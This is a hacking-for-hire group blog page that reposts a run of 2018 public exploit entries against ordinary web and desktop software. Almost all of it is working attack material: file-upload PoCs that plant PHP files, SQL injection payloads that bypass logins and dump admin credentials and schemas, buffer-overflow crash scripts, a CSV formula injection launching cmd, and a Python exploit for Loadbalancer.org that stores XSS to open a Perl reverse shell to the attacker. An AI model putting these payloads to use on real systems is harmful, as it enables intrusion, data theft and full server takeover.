Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863587828

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: CI User Login and Management 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage 1: http://www.webprojectbuilder.com/item/user-login-and-management
# Vendor Homepage 2: https://sourceforge.net/projects/user-management-system/
# Software Link 1: https://kent.dl.sourceforge.net/project/php-user-login-management/PHP_CI_user_login_and_management-1.zip
# Software Link 2: https://netix.dl.sourceforge.net/project/user-management-system/PHP_CI_user_login_and_management-1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/user/add_edit
# 
# http://localhost/[PATH]/assets/images/[FILE]
# 
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------
212160558019833203481522967977
Content-Length: 727
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="fileOld"
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="users_id"
1
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="user_type"
admin
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="submit1"
-----------------------------212160558019833203481522967977--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:36:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: ci_session=599e598042864923e909b54019831db9d06c116f; expires=Tue, 30-Oct-2018 08:36:42 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

GET /[PATH]/assets/images/phpinfo_1540881402.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=599e598042864923e909b54019831db9d06c116f
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:37:08 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/user/add_edit
# 
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit" ">Ver Ayari</button>  
</form>
</body>
</html>
HireHackking 
# Exploit Title: Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution
# Date: 2018-07-24
# Exploit Authors: Jakub Palaczynski
# Vendor Homepage: https://www.loadbalancer.org/
# Version: <= 8.3.2
# CVE: N/A

# Exploit Description: Loadbalancer.org Enterprise VA MAX - Remote Code Execution via Unauthenticated Stored XSS
# Info: It is advised to use HTTPS port instead of HTTP for sending payloads as storing JavaScript in "Apache Error Log" does not work for HTTP.
# Info: JavaScript can be easily changed to for example modify SSH configuration or add/modify web users

# Basic Information:
# Two instances of Stored XSS were found - exploit uses both:
# 1. It is possible to inject custom JavaScript code during authentication to "/lbadmin/".
# Application takes input from Basic Auth (username) and stores it without encoding/sanitization/filtering in "Apache Error Log".
# This instance only forks for HTTPS.
# 2. It is possible to inject custom JavaScript code by accessing URL like /?<XSS>.
# Such JavaScript is stored in "Apache User Log".

# This way attacker can store JavaScript code that can for example execute system command as root. This is actually what this exploit does - spawns reverse shell.
# When application user browses "Apache Error Log" or "Apache User Log" custom JavaScript code gets automatically executed.


#!/usr/bin/python

import socket
import sys
import os
import threading
import subprocess
import time
import base64

# print help or assign arguments
if len(sys.argv) != 3:
    sys.stderr.write("[-]Usage: python %s <our_ip:port> <proto://remote_ip:port>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 192.168.1.1:80 https://192.168.1.2:9443\n" % sys.argv[0])
    sys.exit(1)

lhost = sys.argv[1] # our ip address and port
rhost = sys.argv[2] # ip address and port of vulnerable Loadbalancer
raw = """perl -e 'use Socket;$i=\"""" + lhost.split(":")[0] + """\";$p=""" + lhost.split(":")[1] + """;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" # raw reverse shell in perl
payload_url = 'document.getElementById("lb").contentDocument.forms[0].elements["command"].value = "echo ' + base64.b64encode(raw.encode("ascii")) + ' | base64 -d | bash";document.getElementById("lb").contentDocument.forms[0].submit();' # base64 encoded reverse shell in perl
payload_auth = "<iframe id='lb'/src='/lbadmin/config/command.php'/style='width&colon;0;height&colon;0;border&colon;0;border&colon;none;'/onload=eval(atob('" + base64.b64encode(payload_url.encode("ascii")) + "'))></iframe>:pwd" # base64 encoded reverse shell in perl

# for additional thread to send request in parallel
class requests (threading.Thread):
    def run(self):
        time.sleep(5)
	# send requests to trigger vulnerability
	os.system('curl -s -k -m 10 -X "GET" -H "Authorization: Basic ' + base64.b64encode(payload_auth.encode("ascii")) + '" "' + rhost + '/lbadmin/" > /dev/null') # store payload in Apache Error logs
	os.system('curl -s -k -m 10 -X "GET" "' + rhost + '/?<iframe/id=\'lb\'/src=\'/lbadmin/config/command.php\'/onload=\'eval(atob(\`' + base64.b64encode(payload_url.encode("ascii")) + '\`))\'/style=\'width:0;height:0;border:0;border:none;\'></iframe>" > /dev/null') # store payload in Apache User logs

# for additional thread to receive data from socket
class receiving (threading.Thread):
    def __init__(self, conn):
        threading.Thread.__init__(self)
        self.conn = conn
	self._is_running = True
    def stop(self):
	self._is_running = False
    def run(self):
        while (self._is_running):
            cmd = conn.recv(1024)
            sys.stdout.write(cmd)
            sys.stdout.flush()
	    if cmd == '':
		break
	threadr.stop()

# function that creates socket
def create_socket(port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('0.0.0.0', port))
    sock.listen(10)
    conn, addr = sock.accept()
    return sock, conn, addr

# start thread that sends request
print 'Sending requests that triggers vulnerability.'
thread = requests()
thread.start()

# create socket to receive shell
print 'Now you need to wait for shell.'
sock, conn, addr = create_socket(int(lhost.split(":")[1]))
threadr = receiving(conn)
threadr.start()
while True:
    cmd = raw_input("")
    if cmd == 'exit':
	conn.send(cmd + "\n")
        break
    else:
        conn.send(cmd + "\n")
sock.close()
HireHackking 
# Exploit Title: Simple PHP Shopping Cart 0.9 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://asaancart.wordpress.com/
# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
# Version: 0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
POST /[PATH]/admin/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
username=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&btnSubmit=btnSubmit
HTTP/1.1 302 Found
Date: Tue, 30 Oct 2018 15:46:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

POST /[PATH]/admin/add_cat.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------17014069073451786011304294694
Content-Length: 514
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="category_name"
xxx
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="category_full_image"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="btn_submit"
Create
-----------------------------17014069073451786011304294694--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 15:46:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

#/[PATH]/category_images/xxx_phpinfo.php

<form action="http://localhost/[PATH]/admin/add_cat.php" enctype="multipart/form-data" method="post">
<input name="category_name" value="xxx" type="text" hidden="true">
<input name="category_full_image" type="file">
<input name="btn_submit" value="Create" type="submit">
</form>


# Exploit Title: Simple PHP Shopping Cart 0.9 - SQL Injection
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://asaancart.wordpress.com/
# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
# Version: 0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/shop/page.php?page_id=[SQL]
# 
#[PATH]/page.php
#....
#34 $page_heading = $_GET['page_name'];
#35 $page_id = $_GET['page_id'];
#....
GET /[PATH]/shop/page.php?page_id=-1+unIoN++SELect+0x31%2c0x32%2c0x33%2c0x34%2c(SEleCT+GroUP_COncAT(username,0x3a,password+sePaRATOR+0x3c62723e)+FrOM+auth_user_admin)%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 14:01:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=u4nfc9bijgcbd8na09o8jp4gb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6538
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/admin/login.php
# 
#....
#32 if ($_POST['btnSubmit']=='btnSubmit')
#33 {
#34 	$sql = "SELECT * FROM auth_user_admin WHERE username='".$_POST['username']."' AND password='".md5($_POST['password'])."'";
#....

# POC: 
# 3)
# http://localhost/[PATH]/shop/product.php?product_id=[SQL]
# 
#....
#35 $product_id = $_GET['product_id'];
#....
HireHackking 
#Exploit Title: SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-10-30
#Vendor Homepage: https://www.smartftp.com/en-us/
#Software Link: https://www.smartftp.com/en-us/download
#Tested Version: 9.0.2615.0
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: SmartFTP_9.0.2615.0_Denial_of_Service_(PoC).py
#2.- Open network.txt and copy content to clipboard
#2.- Open SmartFTP Client
#3.- Select Connection
#4.- Paste ClipBoard on "Host" 
#5.- Crashed

cod = "\x41" * 300

f = open('network.txt', 'w')
f.write(cod)
f.close()
HireHackking 
# Exploit Title: Artha The Open Thesaurus 1.0.3.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://artha.sourceforge.net
# Software Link: https://netcologne.dl.sourceforge.net/project/artha/artha/1.0.3/artha_1.0.3.0.exe
# Version: 1.0.3.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Query / Search

#!/usr/bin/python
    
buffer = "A" * 256
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."
HireHackking 
#Exploit Title: WebDrive 18.00.5057 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-10-31
#Vendor Homepage: https://webdrive.com/
#Software Link: https://webdrive.com/download/
#Tested Version: 18.00.5057
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: WebDrive_18.00.5057.py
#2.- Open string.txt and copy content to clipboard
#2.- Open WebDrive
#3.- Select "New"
#4.- Select "Secure WebDAV" and click on "Siguiente"
#6.- Select "Url / Address" and Put "1.1.1.1" 
#7.- Select "Username" and Paste ClipBoard
#8.- Select "Password" and Put "1234"
#9.- Click on "Test Connection"
#10.- Crashed

cod = "\x41" * 5000

f = open('string.txt', 'w')
f.write(cod)
f.close()
HireHackking 
# Exploit Title: Fantastic Blog CMS 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/ronald-ronniem/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Ronald%20Ronnie/fantasticblog_0.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/single.php?id=[SQL]
# 
#[PATH]/single.php
#....
#04 $id=$_REQUEST['id']; $query="SELECT * from blogs where id='".$id."'"...........
#05 $row = mysqli_fetch_assoc($result);
#....
GET /[PATH]/single.php?id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 08:42:57 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/category.php?id=[SQL]
# 
#[PATH]/category.php
#....
#04 $id=$_REQUEST['id']; $query="SELECT * from blog_categories where id='".$id."'"...........
#05 $row = mysqli_fetch_assoc($result);?>
#....
GET /[PATH]/category.php?id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __atuvc=1%7C44; __atuvs=5bd96b11114f485b000
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 08:46:57 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title: Arm Whois 3.11 - Denial of Service (PoC)
# Date: 2018-10-31
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Profesional Español SP3 x86 

# Steps to Produce the Crash:
# 1.- Run python code : python whois.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- Crashed!

buffer = "\x41" * 700
f = open("text.txt", "w")
f.write(buffer)
f.close()
HireHackking 
# Exploit Title: Anviz AIM CrossChex Standard 4.3 - CSV Injection
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-11-01
# Vendor: Anviz Biometric Technology Co., Ltd.
# Product web page: https://www.anviz.com
# Affected version: 4.3.6.0
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# CVE: N/A
# References
# Advisory ID: ZSL-2018-5498
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php

# Desc: CSV (XLS) Injection (Excel Macro Injection or Formula
# Injection) exists in the AIM CrossChex 4.3 when importing
# or exporting users using xls Excel file. This can be exploited
# to execute arbitrary commands on the affected system via
# SE attacks when an attacker inserts formula payload in the
# 'Name' field when adding a user or using the custom fields
# 'Gender', 'Position', 'Phone', 'Birthday', 'Employ Date'
# and 'Address'. Upon importing, the application will launch
# Excel program and execute the malicious macro formula.

# PoC
# From the menu:

User -> Add -> use payload: =cmd|' /C mspaint'!L337
User -> Import / Export: use payload: =cmd|' /C mspaint'!L337
HireHackking 
# Exploit Title: Jelastic 5.4 - 'host' SQL injection
# Google Dork: N/A
# Date: [date]
# Exploit Author: Procode701
# Vendor Homepage: https://jelastic.com/
# Software Link: https://jelastic.com/
# Version: 5.4
# Tested on: [Kali Linux]
# CVE : N/A

# POC: 
# The application /1.0/users/authentication/rest/signin is vulnerable to SQL injection.
# Vulnerable application Header field: Host:' AND 8494=8494-- ttWV

# EXPLOIT POC :
# Parameter: Host #1* ((custom) HEADER)
#     Type: boolean-based blind
#     Payload:' AND 8494=8494-- ttWV
# PAYLOAD: ' AND 8494=8494-- ttWV

POST /1.0/users/authentication/rest/signin HTTP/1.1
Host: localhost'-8564' OR 8495=8495-- yjRM--delay=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 128
Cookie: GLang=en; GLocale=en-us; jrouter=b916bf4d3b39e6029fd403f21566f3f1
DNT: 1
Connection: close

charset=UTF-8&hx_lang=en&session=1&ruk=cccc5e05-c0cb-4419-8a34-tab606191&email=testing%40gg.com&password=testing&appid=dashboard
HireHackking 
# Exploit Title: Yot CMS 3.3.1 - 'aid' SQL Injection
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://yot.sourceforge.io/
# Software Link: https://ayera.dl.sourceforge.net/project/yot/Yot%203.3.1.zip
# Version: 3.3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php?page=articles&op=art&aid=[SQL]
# 
GET /[PATH]/index.php?page=articles&op=art&aid=1++uniON+SElEcT++++0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 23:21:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/index.php?page=articles&op=cat&cid=[SQL]
# 
GET /[PATH]/index.php?page=articles&op=cat&cid=1++uniON+SElEcT++++0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 23:32:28 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title: qdPM 9.1 - 'filter_by' SQL Injection
# Date: 2018-11-01
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software description:
# Free project management tool for small team
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.

# Vulnerabilities:
# The application accommodates 3 different vulnerabilities.
# SQL Injection - Cross-Site Scripting and Denial of Service.

# POC 1 : SQL Inection :
# An attacker can gain access to all the database information using filter_by[CommentCreatedFrom]
# and filter_by[5BCommentCreatedTo] parameters.

# Parameter: filter_by[CommentCreatedFrom] and filter_by[5BCommentCreatedTo](POST)
# Request URL: /index.php/timeReport

#    Type: boolean-based blind
#    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
#    Payload: 

filter_by[CommentCreatedFrom]=2018-10-30") RLIKE (SELECT (CASE WHEN (7166=7166) THEN #0x323031382d31302d3330 ELSE 0x28 END)) AND ("votm"="votm&filter_by[CommentCreatedTo]=2018-10-17

#    Type: error-based
#    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
#    Payload: 

filter_by[CommentCreatedFrom]=2018-10-30") AND EXTRACTVALUE(2944,CONCAT(0x5c,0x716a766b71,(SELECT #(ELT(2944=2944,1))),0x7178717871)) AND ("ilfY"="ilfY&filter_by[CommentCreatedTo]=2018-10-17

#    Type: stacked queries
#    Title: MySQL > 5.0.11 stacked queries (comment)
#    Payload: 

filter_by[CommentCreatedFrom]=2018-10-30");SELECT SLEEP(5)#&filter_by[CommentCreatedTo]=2018-10-17

#    Type: AND/OR time-based blind
#    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
#    Payload:

filter_by[CommentCreatedFrom]=2018-10-30") AND 2173=BENCHMARK(5000000,MD5(0x7652785a)) AND #("PRig"="PRig&filter_by[CommentCreatedTo]=2018-10-17

#    Type: UNION query
#    Title: Generic UNION query (NULL) - 40 columns
#    Payload:

filter_by[CommentCreatedFrom]=2018-10-30") UNION ALL SELECT #33,33,33,33,33,33,33,33,33,33,CONCAT(0x716a766b71,0x474b474f65666b437365466773655373776743495a75536670676f41445249514775775a6f4d6a63,0x7178717871),#33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33-- #pqmn&filter_by[CommentCreatedTo]=2018-10-17
HireHackking 
# Exploit Title: Gate Pass Management System 2.1 - 'login' SQL Injection
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.livebms.com
# Software Link: https://netcologne.dl.sourceforge.net/project/gatepass/gpms_Update.zip
# Version: 2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/login-exec.php
# 
POST /[PATH]/login-exec.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=dfbpcp36b5ura1aurmtm3dqbr0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
login=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&Submit=Login
HTTP/1.1 302 Found
Date: Thu, 01 Nov 2018 12:08:54 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
